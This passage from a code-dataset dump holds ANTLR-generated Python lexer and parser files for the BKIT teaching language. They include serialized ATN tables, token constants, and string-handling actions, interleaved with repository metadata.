buf.write(\"\\7(\\2\\2\\u01d2l\\3\\2\\2\\2\\u01d3\\u01d4\\7~\\2\\2\\u01d4\\u01d5\")\n buf.write(\"\\7~\\2\\2\\u01d5n\\3\\2\\2\\2\\u01d6\\u01d7\\7?\\2\\2\\u01d7\\u01d8\")\n buf.write(\"\\7?\\2\\2\\u01d8p\\3\\2\\2\\2\\u01d9\\u01da\\7#\\2\\2\\u01da\\u01db\")\n buf.write(\"\\7?\\2\\2\\u01dbr\\3\\2\\2\\2\\u01dc\\u01dd\\7>\\2\\2\\u01ddt\\3\\2\\2\")\n buf.write(\"\\2\\u01de\\u01df\\7@\\2\\2\\u01dfv\\3\\2\\2\\2\\u01e0\\u01e1\\7>\\2\")\n buf.write(\"\\2\\u01e1\\u01e2\\7?\\2\\2\\u01e2x\\3\\2\\2\\2\\u01e3\\u01e4\\7@\\2\")\n buf.write(\"\\2\\u01e4\\u01e5\\7?\\2\\2\\u01e5z\\3\\2\\2\\2\\u01e6\\u01e7\\7?\\2\")\n buf.write(\"\\2\\u01e7\\u01e8\\7\\61\\2\\2\\u01e8\\u01e9\\7?\\2\\2\\u01e9|\\3\\2\")\n buf.write(\"\\2\\2\\u01ea\\u01eb\\7>\\2\\2\\u01eb\\u01ec\\7\\60\\2\\2\\u01ec~\\3\")\n buf.write(\"\\2\\2\\2\\u01ed\\u01ee\\7@\\2\\2\\u01ee\\u01ef\\7\\60\\2\\2\\u01ef\\u0080\")\n buf.write(\"\\3\\2\\2\\2\\u01f0\\u01f1\\7>\\2\\2\\u01f1\\u01f2\\7?\\2\\2\\u01f2\\u01f3\")\n buf.write(\"\\7\\60\\2\\2\\u01f3\\u0082\\3\\2\\2\\2\\u01f4\\u01f5\\7@\\2\\2\\u01f5\")\n buf.write(\"\\u01f6\\7?\\2\\2\\u01f6\\u01f7\\7\\60\\2\\2\\u01f7\\u0084\\3\\2\\2\\2\")\n buf.write(\"\\u01f8\\u01f9\\7*\\2\\2\\u01f9\\u0086\\3\\2\\2\\2\\u01fa\\u01fb\\7\")\n buf.write(\"+\\2\\2\\u01fb\\u0088\\3\\2\\2\\2\\u01fc\\u01fd\\7]\\2\\2\\u01fd\\u008a\")\n buf.write(\"\\3\\2\\2\\2\\u01fe\\u01ff\\7_\\2\\2\\u01ff\\u008c\\3\\2\\2\\2\\u0200\")\n buf.write(\"\\u0201\\7}\\2\\2\\u0201\\u008e\\3\\2\\2\\2\\u0202\\u0203\\7\\177\\2\")\n buf.write(\"\\2\\u0203\\u0090\\3\\2\\2\\2\\u0204\\u0205\\7<\\2\\2\\u0205\\u0092\")\n buf.write(\"\\3\\2\\2\\2\\u0206\\u0207\\7\\60\\2\\2\\u0207\\u0094\\3\\2\\2\\2\\u0208\")\n buf.write(\"\\u0209\\7=\\2\\2\\u0209\\u0096\\3\\2\\2\\2\\u020a\\u020b\\7.\\2\\2\\u020b\")\n buf.write(\"\\u0098\\3\\2\\2\\2\\u020c\\u020d\\7?\\2\\2\\u020d\\u009a\\3\\2\\2\\2\")\n buf.write(\"\\u020e\\u020f\\7$\\2\\2\\u020f\\u009c\\3\\2\\2\\2\\u0210\\u0211\\7\")\n buf.write(\"k\\2\\2\\u0211\\u0212\\7p\\2\\2\\u0212\\u0213\\7v\\2\\2\\u0213\\u0214\")\n buf.write(\"\\7a\\2\\2\\u0214\\u0215\\7q\\2\\2\\u0215\\u0216\\7h\\2\\2\\u0216\\u0217\")\n buf.write(\"\\7a\\2\\2\\u0217\\u0218\\7h\\2\\2\\u0218\\u0219\\7n\\2\\2\\u0219\\u021a\")\n buf.write(\"\\7q\\2\\2\\u021a\\u021b\\7c\\2\\2\\u021b\\u021c\\7v\\2\\2\\u021c\\u009e\")\n buf.write(\"\\3\\2\\2\\2\\u021d\\u021e\\7k\\2\\2\\u021e\\u021f\\7p\\2\\2\\u021f\\u0220\")\n buf.write(\"\\7v\\2\\2\\u0220\\u0221\\7a\\2\\2\\u0221\\u0222\\7q\\2\\2\\u0222\\u0223\")\n buf.write(\"\\7h\\2\\2\\u0223\\u0224\\7a\\2\\2\\u0224\\u0225\\7u\\2\\2\\u0225\\u0226\")\n buf.write(\"\\7v\\2\\2\\u0226\\u0227\\7t\\2\\2\\u0227\\u0228\\7k\\2\\2\\u0228\\u0229\")\n buf.write(\"\\7p\\2\\2\\u0229\\u022a\\7i\\2\\2\\u022a\\u00a0\\3\\2\\2\\2\\u022b\\u022c\")\n buf.write(\"\\7h\\2\\2\\u022c\\u022d\\7n\\2\\2\\u022d\\u022e\\7q\\2\\2\\u022e\\u022f\")\n buf.write(\"\\7c\\2\\2\\u022f\\u0230\\7v\\2\\2\\u0230\\u0231\\7a\\2\\2\\u0231\\u0232\")\n buf.write(\"\\7v\\2\\2\\u0232\\u0233\\7q\\2\\2\\u0233\\u0234\\7a\\2\\2\\u0234\\u0235\")\n buf.write(\"\\7k\\2\\2\\u0235\\u0236\\7p\\2\\2\\u0236\\u0237\\7v\\2\\2\\u0237\\u00a2\")\n buf.write(\"\\3\\2\\2\\2\\u0238\\u0239\\7h\\2\\2\\u0239\\u023a\\7n\\2\\2\\u023a\\u023b\")\n buf.write(\"\\7q\\2\\2\\u023b\\u023c\\7c\\2\\2\\u023c\\u023d\\7v\\2\\2\\u023d\\u023e\")\n buf.write(\"\\7a\\2\\2\\u023e\\u023f\\7q\\2\\2\\u023f\\u0240\\7h\\2\\2\\u0240\\u0241\")\n buf.write(\"\\7a\\2\\2\\u0241\\u0242\\7u\\2\\2\\u0242\\u0243\\7v\\2\\2\\u0243\\u0244\")\n buf.write(\"\\7t\\2\\2\\u0244\\u0245\\7k\\2\\2\\u0245\\u0246\\7p\\2\\2\\u0246\\u0247\")\n buf.write(\"\\7i\\2\\2\\u0247\\u00a4\\3\\2\\2\\2\\u0248\\u0249\\7d\\2\\2\\u0249\\u024a\")\n buf.write(\"\\7q\\2\\2\\u024a\\u024b\\7q\\2\\2\\u024b\\u024c\\7n\\2\\2\\u024c\\u024d\")\n buf.write(\"\\7a\\2\\2\\u024d\\u024e\\7q\\2\\2\\u024e\\u024f\\7h\\2\\2\\u024f\\u0250\")\n buf.write(\"\\7a\\2\\2\\u0250\\u0251\\7u\\2\\2\\u0251\\u0252\\7v\\2\\2\\u0252\\u0253\")\n buf.write(\"\\7t\\2\\2\\u0253\\u0254\\7k\\2\\2\\u0254\\u0255\\7p\\2\\2\\u0255\\u0256\")\n buf.write(\"\\7i\\2\\2\\u0256\\u00a6\\3\\2\\2\\2\\u0257\\u0258\\7u\\2\\2\\u0258\\u0259\")\n buf.write(\"\\7v\\2\\2\\u0259\\u025a\\7t\\2\\2\\u025a\\u025b\\7k\\2\\2\\u025b\\u025c\")\n buf.write(\"\\7p\\2\\2\\u025c\\u025d\\7i\\2\\2\\u025d\\u025e\\7a\\2\\2\\u025e\\u025f\")\n buf.write(\"\\7q\\2\\2\\u025f\\u0260\\7h\\2\\2\\u0260\\u0261\\7a\\2\\2\\u0261\\u0262\")\n buf.write(\"\\7d\\2\\2\\u0262\\u0263\\7q\\2\\2\\u0263\\u0264\\7q\\2\\2\\u0264\\u0265\")\n buf.write(\"\\7n\\2\\2\\u0265\\u00a8\\3\\2\\2\\2\\u0266\\u0267\\7u\\2\\2\\u0267\\u0268\")\n buf.write(\"\\7v\\2\\2\\u0268\\u0269\\7t\\2\\2\\u0269\\u026a\\7k\\2\\2\\u026a\\u026b\")\n buf.write(\"\\7p\\2\\2\\u026b\\u026c\\7i\\2\\2\\u026c\\u026d\\7a\\2\\2\\u026d\\u026e\")\n buf.write(\"\\7q\\2\\2\\u026e\\u026f\\7h\\2\\2\\u026f\\u0270\\7a\\2\\2\\u0270\\u0271\")\n buf.write(\"\\7k\\2\\2\\u0271\\u0272\\7p\\2\\2\\u0272\\u0273\\7v\\2\\2\\u0273\\u00aa\")\n buf.write(\"\\3\\2\\2\\2\\u0274\\u0275\\7u\\2\\2\\u0275\\u0276\\7v\\2\\2\\u0276\\u0277\")\n buf.write(\"\\7t\\2\\2\\u0277\\u0278\\7k\\2\\2\\u0278\\u0279\\7p\\2\\2\\u0279\\u027a\")\n buf.write(\"\\7i\\2\\2\\u027a\\u027b\\7a\\2\\2\\u027b\\u027c\\7q\\2\\2\\u027c\\u027d\")\n buf.write(\"\\7h\\2\\2\\u027d\\u027e\\7a\\2\\2\\u027e\\u027f\\7h\\2\\2\\u027f\\u0280\")\n buf.write(\"\\7n\\2\\2\\u0280\\u0281\\7q\\2\\2\\u0281\\u0282\\7c\\2\\2\\u0282\\u0283\")\n buf.write(\"\\7v\\2\\2\\u0283\\u00ac\\3\\2\\2\\2\\u0284\\u0285\\7,\\2\\2\\u0285\\u0286\")\n buf.write(\"\\7,\\2\\2\\u0286\\u028a\\3\\2\\2\\2\\u0287\\u0289\\13\\2\\2\\2\\u0288\")\n buf.write(\"\\u0287\\3\\2\\2\\2\\u0289\\u028c\\3\\2\\2\\2\\u028a\\u028b\\3\\2\\2\\2\")\n buf.write(\"\\u028a\\u0288\\3\\2\\2\\2\\u028b\\u028d\\3\\2\\2\\2\\u028c\\u028a\\3\")\n buf.write(\"\\2\\2\\2\\u028d\\u028e\\7,\\2\\2\\u028e\\u028f\\7,\\2\\2\\u028f\\u0290\")\n buf.write(\"\\3\\2\\2\\2\\u0290\\u0291\\bW\\3\\2\\u0291\\u00ae\\3\\2\\2\\2\\u0292\")\n buf.write(\"\\u0294\\t\\17\\2\\2\\u0293\\u0292\\3\\2\\2\\2\\u0294\\u0295\\3\\2\\2\")\n buf.write(\"\\2\\u0295\\u0293\\3\\2\\2\\2\\u0295\\u0296\\3\\2\\2\\2\\u0296\\u0297\")\n buf.write(\"\\3\\2\\2\\2\\u0297\\u0298\\bX\\3\\2\\u0298\\u00b0\\3\\2\\2\\2\\u0299\")\n buf.write(\"\\u029d\\7$\\2\\2\\u029a\\u029c\\5\\31\\r\\2\\u029b\\u029a\\3\\2\\2\\2\")\n buf.write(\"\\u029c\\u029f\\3\\2\\2\\2\\u029d\\u029b\\3\\2\\2\\2\\u029d\\u029e\\3\")\n buf.write(\"\\2\\2\\2\\u029e\\u02a0\\3\\2\\2\\2\\u029f\\u029d\\3\\2\\2\\2\\u02a0\\u02a1\")\n buf.write(\"\\5\\23\\n\\2\\u02a1\\u02a2\\bY\\4\\2\\u02a2\\u00b2\\3\\2\\2\\2\\u02a3\")\n buf.write(\"\\u02a7\\7$\\2\\2\\u02a4\\u02a6\\5\\31\\r\\2\\u02a5\\u02a4\\3\\2\\2\\2\")\n buf.write(\"\\u02a6\\u02a9\\3\\2\\2\\2\\u02a7\\u02a5\\3\\2\\2\\2\\u02a7\\u02a8\\3\")\n buf.write(\"\\2\\2\\2\\u02a8\\u02ab\\3\\2\\2\\2\\u02a9\\u02a7\\3\\2\\2\\2\\u02aa\\u02ac\")\n buf.write(\"\\t\\20\\2\\2\\u02ab\\u02aa\\3\\2\\2\\2\\u02ac\\u02ad\\3\\2\\2\\2\\u02ad\")\n buf.write(\"\\u02ae\\bZ\\5\\2\\u02ae\\u00b4\\3\\2\\2\\2\\u02af\\u02b0\\7,\\2\\2\\u02b0\")\n buf.write(\"\\u02b1\\7,\\2\\2\\u02b1\\u02b7\\3\\2\\2\\2\\u02b2\\u02b3\\7,\\2\\2\\u02b3\")\n buf.write(\"\\u02b6\\n\\21\\2\\2\\u02b4\\u02b6\\n\\21\\2\\2\\u02b5\\u02b2\\3\\2\\2\")\n buf.write(\"\\2\\u02b5\\u02b4\\3\\2\\2\\2\\u02b6\\u02b9\\3\\2\\2\\2\\u02b7\\u02b8\")\n buf.write(\"\\3\\2\\2\\2\\u02b7\\u02b5\\3\\2\\2\\2\\u02b8\\u02ba\\3\\2\\2\\2\\u02b9\")\n buf.write(\"\\u02b7\\3\\2\\2\\2\\u02ba\\u02bb\\7\\2\\2\\3\\u02bb\\u00b6\\3\\2\\2\\2\")\n buf.write(\"\\u02bc\\u02bd\\13\\2\\2\\2\\u02bd\\u00b8\\3\\2\\2\\2\\35\\2\\u00be\\u00c0\")\n buf.write(\"\\u00cb\\u00d0\\u00d5\\u00db\\u00e1\\u00e5\\u00e8\\u00f6\\u0100\")\n buf.write(\"\\u0106\\u010e\\u0111\\u0117\\u011d\\u0123\\u0129\\u012f\\u028a\")\n buf.write(\"\\u0295\\u029d\\u02a7\\u02ab\\u02b5\\u02b7\\6\\3\\26\\2\\b\\2\\2\\3\")\n buf.write(\"Y\\3\\3Z\\4\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n ID = 1\n INT_LIT = 2\n FLOAT_LIT = 3\n BOOL_LIT = 4\n STRING_LIT = 5\n BODY = 6\n BREAK = 7\n CONTINUE = 8\n DO = 9\n ELSE = 10\n ELSEIF = 11\n ENDIF = 12\n ENDBODY = 13\n ENDFOR = 14\n ENDWHILE = 15\n FOR = 16\n FUNCTION = 17\n IF = 18\n PARAMETER = 19\n RETURN = 20\n THEN = 21\n VAR = 22\n WHILE = 23\n TRUE = 24\n FALSE = 25\n ENDDO = 26\n PLUS_INT = 27\n PLUS_FLOAT = 28\n MINUS_INT = 29\n MINUS_FLOAT = 30\n STAR_INT = 31\n STAR_FLOAT = 32\n DIV_INT = 33\n DIV_FLOAT = 34\n MOD = 35\n NOT = 36\n AND = 37\n OR = 38\n EQUAL = 39\n NOT_EQUAL_INT = 40\n LESS_INT = 41\n GREATER_INT = 42\n LESS_OR_EQUAL_INT = 43\n GREATER_OR_EQUAL_INT = 44\n NOT_EQUAL_FLOAT = 45\n LESS_FLOAT = 46\n GREATER_FLOAT = 47\n LESS_OR_EQUAL_FLOAT = 48\n GREATER_OR_EQUAL_FLOAT = 49\n LEFT_PAREN = 50\n RIGHT_PAREN = 51\n LEFT_BRACKET = 52\n RIGHT_BRACKET = 53\n LEFT_BRACE = 54\n RIGHT_BRACE = 55\n COLON = 56\n DOT = 57\n SEMI = 58\n COMMA = 59\n ASSIGN = 60\n DOUBLE_QUOTE = 61\n INT_OF_FLOAT = 62\n INT_OF_STRING = 63\n FLOAT_TO_INT = 64\n FLOAT_OF_STRING = 65\n BOOL_OF_STRING = 66\n STRING_OF_BOOL = 67\n STRING_OF_INT = 68\n STRING_OF_FLOAT = 69\n COMMENT = 70\n WS = 71\n ILLEGAL_ESCAPE = 72\n UNCLOSE_STRING = 73\n UNTERMINATED_COMMENT = 74\n ERROR_CHAR = 75\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElseIf'\", \n \"'EndIf'\", \"'EndBody'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n \"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'\\\\%'\", \"'!'\", \"'&&'\", \"'||'\", \n \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=/='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\", \"'\\\"'\", \"'int_of_float'\", \n \"'int_of_string'\", \"'float_to_int'\", \"'float_of_string'\", \"'bool_of_string'\", \n \"'string_of_bool'\", \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"ID\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \"STRING_LIT\", \"BODY\", \n \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \"DOUBLE_QUOTE\", \n \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \"FLOAT_OF_STRING\", \n \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \n \"COMMENT\", \"WS\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n ruleNames = [ \"ID\", \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \n \"LETTER\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n \"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \n \"STRING_CHAR\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \n \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \n \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \n \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \n \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \"STAR_FLOAT\", \n \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \n \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \n \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \n \"LEFT_PAREN\", \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \n \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \n \"ASSIGN\", \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \n \"FLOAT_TO_INT\", \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[20] = self.STRING_LIT_action \n actions[87] = self.ILLEGAL_ESCAPE_action \n actions[88] = self.UNCLOSE_STRING_action \n self._actions = actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + str(ruleIndex))\n\n\n def STRING_LIT_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n y = str(self.text)\n self.text = y[1:-1]\n \n \n\n def ILLEGAL_ESCAPE_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 1:\n\n y = str(self.text)\n self.text = y[1:]\n \n \n\n def UNCLOSE_STRING_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 2:\n\n y = str(self.text)\n self.text = y[1:]\n \n \n\n\n" }, { "alpha_fraction": 0.4293690621852875, "alphanum_fraction": 0.5801228284835815, "avg_line_length": 31.527273178100586, "blob_id": "c42cc0a84b8b62ffa6f6fa5490821db61004dcad", "content_id": "03c2a0b25dd5cec0f5bede3adc089a2416875d0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1791, "license_type": "no_license", "max_line_length": 103, "num_lines": 55, "path": "/target/LexicalAnalysisLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from LexicalAnalysis.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\n\tfrom lexererr import *;\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\4\")\n buf.write(\"\\31\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\3\\2\\3\\2\\3\\3\\3\")\n buf.write(\"\\3\\3\\4\\6\\4\\21\\n\\4\\r\\4\\16\\4\\22\\3\\5\\6\\5\\26\\n\\5\\r\\5\\16\\5\")\n buf.write(\"\\27\\2\\2\\6\\3\\2\\5\\2\\7\\3\\t\\4\\3\\2\\5\\3\\2c|\\3\\2\\62;\\5\\2\\13\\f\")\n buf.write(\"\\17\\17\\\"\\\"\\2\\30\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\\3\\13\\3\\2\\2\\2\\5\")\n buf.write(\"\\r\\3\\2\\2\\2\\7\\20\\3\\2\\2\\2\\t\\25\\3\\2\\2\\2\\13\\f\\t\\2\\2\\2\\f\\4\")\n buf.write(\"\\3\\2\\2\\2\\r\\16\\t\\3\\2\\2\\16\\6\\3\\2\\2\\2\\17\\21\\5\\3\\2\\2\\20\\17\")\n buf.write(\"\\3\\2\\2\\2\\21\\22\\3\\2\\2\\2\\22\\20\\3\\2\\2\\2\\22\\23\\3\\2\\2\\2\\23\")\n buf.write(\"\\b\\3\\2\\2\\2\\24\\26\\t\\4\\2\\2\\25\\24\\3\\2\\2\\2\\26\\27\\3\\2\\2\\2\\27\")\n buf.write(\"\\25\\3\\2\\2\\2\\27\\30\\3\\2\\2\\2\\30\\n\\3\\2\\2\\2\\5\\2\\22\\27\\2\")\n return buf.getvalue()\n\n\nclass LexicalAnalysisLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n ID = 1\n WS = 2\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n ]\n\n symbolicNames = [ \"<INVALID>\",\n \"ID\", \"WS\" ]\n\n ruleNames = [ \"LETTER\", \"NUMBER\", \"ID\", \"WS\" ]\n\n grammarFileName = \"LexicalAnalysis.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n" }, { "alpha_fraction": 0.5208368897438049, "alphanum_fraction": 0.5554218888282776, "avg_line_length": 31.592437744140625, "blob_id": "d8a0ad41de03fcaeb3b3beeff62ad83d38343613", "content_id": "e113ec12161d441d400d91b953d910081ec95769", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23276, "license_type": "no_license", "max_line_length": 407, "num_lines": 714, "path": "/SyntaxAnalysis/src/main/bkit/parser/.antlr/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/SyntaxAnalysis/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3E\")\n buf.write(\"A\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\\4\\b\")\n buf.write(\"\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\3\\2\\3\\2\")\n buf.write(\"\\6\\2\\35\\n\\2\\r\\2\\16\\2\\36\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\3\\6\\3\\6\\3\\7\\3\\7\\3\\b\")\n buf.write(\"\\3\\b\\3\\t\\3\\t\\3\\n\\3\\n\\3\\13\\3\\13\\3\\f\\3\\f\\3\\r\\3\\r\\3\\r\\2\\2\")\n buf.write(\"\\16\\2\\4\\6\\b\\n\\f\\16\\20\\22\\24\\26\\30\\2\\6\\3\\2\\13\\16\\3\\2-/\")\n buf.write(\"\\b\\2$$&&((**,,\\60\\65\\7\\2%%\\'\\'))++\\66:\\2\\66\\2\\34\\3\\2\\2\")\n buf.write(\"\\2\\4\\\"\\3\\2\\2\\2\\6%\\3\\2\\2\\2\\b.\\3\\2\\2\\2\\n\\60\\3\\2\\2\\2\\f\\62\")\n buf.write(\"\\3\\2\\2\\2\\16\\64\\3\\2\\2\\2\\20\\66\\3\\2\\2\\2\\228\\3\\2\\2\\2\\24:\\3\")\n buf.write(\"\\2\\2\\2\\26<\\3\\2\\2\\2\\30>\\3\\2\\2\\2\\32\\35\\5\\4\\3\\2\\33\\35\\5\\6\")\n buf.write(\"\\4\\2\\34\\32\\3\\2\\2\\2\\34\\33\\3\\2\\2\\2\\35\\36\\3\\2\\2\\2\\36\\34\\3\")\n buf.write(\"\\2\\2\\2\\36\\37\\3\\2\\2\\2\\37 \\3\\2\\2\\2 !\\7\\2\\2\\3!\\3\\3\\2\\2\\2\")\n buf.write(\"\\\"#\\7\\37\\2\\2#$\\7C\\2\\2$\\5\\3\\2\\2\\2%&\\7\\32\\2\\2&\\'\\7A\\2\\2\")\n buf.write(\"\\'(\\7\\4\\2\\2()\\7\\34\\2\\2)*\\7\\17\\2\\2*+\\7A\\2\\2+,\\7\\26\\2\\2\")\n buf.write(\",-\\7B\\2\\2-\\7\\3\\2\\2\\2./\\t\\2\\2\\2/\\t\\3\\2\\2\\2\\60\\61\\5\\f\\7\")\n buf.write(\"\\2\\61\\13\\3\\2\\2\\2\\62\\63\\3\\2\\2\\2\\63\\r\\3\\2\\2\\2\\64\\65\\t\\3\")\n buf.write(\"\\2\\2\\65\\17\\3\\2\\2\\2\\66\\67\\t\\4\\2\\2\\67\\21\\3\\2\\2\\289\\t\\5\\2\")\n buf.write(\"\\29\\23\\3\\2\\2\\2:;\\3\\2\\2\\2;\\25\\3\\2\\2\\2<=\\3\\2\\2\\2=\\27\\3\\2\")\n buf.write(\"\\2\\2>?\\3\\2\\2\\2?\\31\\3\\2\\2\\2\\4\\34\\36\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \n \"'Else'\", \"'ElSelf'\", \"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \n \"'EndWhile'\", \"'For'\", \"'Function'\", \"'If'\", \"'Parameter'\", \n \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \"'True'\", \n \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \n \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \n 